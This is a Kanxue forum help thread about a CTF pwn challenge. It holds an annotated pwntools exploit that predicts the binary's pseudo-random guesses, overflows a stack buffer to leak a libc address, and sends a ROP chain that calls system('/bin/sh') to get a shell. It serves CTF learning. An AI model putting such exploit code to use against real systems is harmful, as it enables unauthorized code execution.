1、伪随机数;2、多次登录栈溢出;3、可以泄露栈地址;4、ret2shellcode,但失败了
#溢出
---
来源: 看雪论坛
原文链接: https://bbs.kanxue.com/thread-289013.htm
[求助]请帮忙解一道pwn
我的思路是通过伪随机数控制栈溢出长度,可以直接泄露libc后直接ROP拿shell,你可以参考下面代码:
# Proof-of-concept posted in the thread against a CTF binary whose number-guessing
# game uses a predictable generator and whose post-"success" read overruns a
# fixed-size stack buffer.  From a defender's view those two are the defects to
# fix in the target: seed from a CSPRNG and bound the read.
#
# ru/sl/s/rn/stre/lg/start/get_sb/ia, together with io and libc, come from a
# pwntools-style template that is not part of the post; they are undefined here.
# Indentation was lost in the forum rendering and is restored from the
# 72 = 23 + 1 + 47 + 1 round count.

rand_num = []  # generator outputs observed in the first session
# Menu option 2 prints a chosen number of generator outputs; 72 are requested,
# which is exactly the number of guessing rounds made below.
ru(b"ch:")
sl(b'2')
ru(b"How many random numbers are outputted?")
sl(b'72')
for i in range(72):
    num = int(ru(b'\n')[:-1])  # one value per line; drop the trailing newline
    rand_num.append(num)
print(rand_num)
# A fresh session is started; the post's premise ("伪随机数") is that the
# generator is seeded identically each time, so the recorded sequence replays.
io.close()
io = start()
count = 0  # index of the next recorded value to replay
# Option 1 is the guessing game; (x % 901) + 100 maps each value into
# [100, 1000] — presumably the same reduction the binary applies; confirm.
for i in range(23):
    ru(b"ch:")
    sl(b'1')
    ru(b"guess a number:")
    sl(stre((rand_num[count] % 901) + 100))
    count += 1
    ru(b"success\n")
    sl(b'a')  # the prompt that follows "success" is answered with one byte
# 24th round: the input after "success" is used to over-read the stack.
ru(b"ch:")
sl(b'1')
ru(b"guess a number:")
sl(stre((rand_num[count] % 901) + 100))
count += 1
ru(b"success\n")
payload = b'a' * 22 + b'!!'  # 22 filler bytes plus a "!!" marker to locate the leak; no newline (s, not sl)
s(payload)
ru(b'!!')
# The six bytes after the marker are read as a libc pointer.  The offset
# 0x727f5c446664 - 0x727f5c400000 (= 0x46664) was measured in one run against
# one libc build; it has to be re-derived for any other libc.
libc_base = u64(rn(6).ljust(8,b'\x00')) - (0x727f5c446664 - 0x727f5c400000)
lg("libc_base")
system_addr, binsh_addr = get_sb()  # template helper; presumably derives both from libc_base — not shown
# libc.search returns an iterator; next(...) is the idiomatic spelling of .__next__().
pop_rdi = libc_base + libc.search(asm("pop rdi;ret")).__next__()
# 47 more rounds replayed exactly as above.
for i in range(47):
    ru(b"ch:")
    sl(b'1')
    ru(b"guess a number:")
    sl(stre((rand_num[count] % 901) + 100))
    count += 1
    ru(b"success\n")
    sl(b'a')
# Final (72nd) round.
ru(b"ch:")
gdb.attach(io)  # leftover debugging hook: blocks or fails when no debugger is available
sl(b'1')
ru(b"guess a number:")
sl(stre((rand_num[count] % 901) + 100))
count += 1
ru(b"success\n")
# 0x28 bytes of padding precede the saved return address; pop_rdi + 1 is the
# trailing "ret" byte of the same gadget.
payload = b'a' * 0x28 + p64(pop_rdi) + p64(binsh_addr) + p64(pop_rdi + 1) + p64(system_addr)
sl(payload)
ia()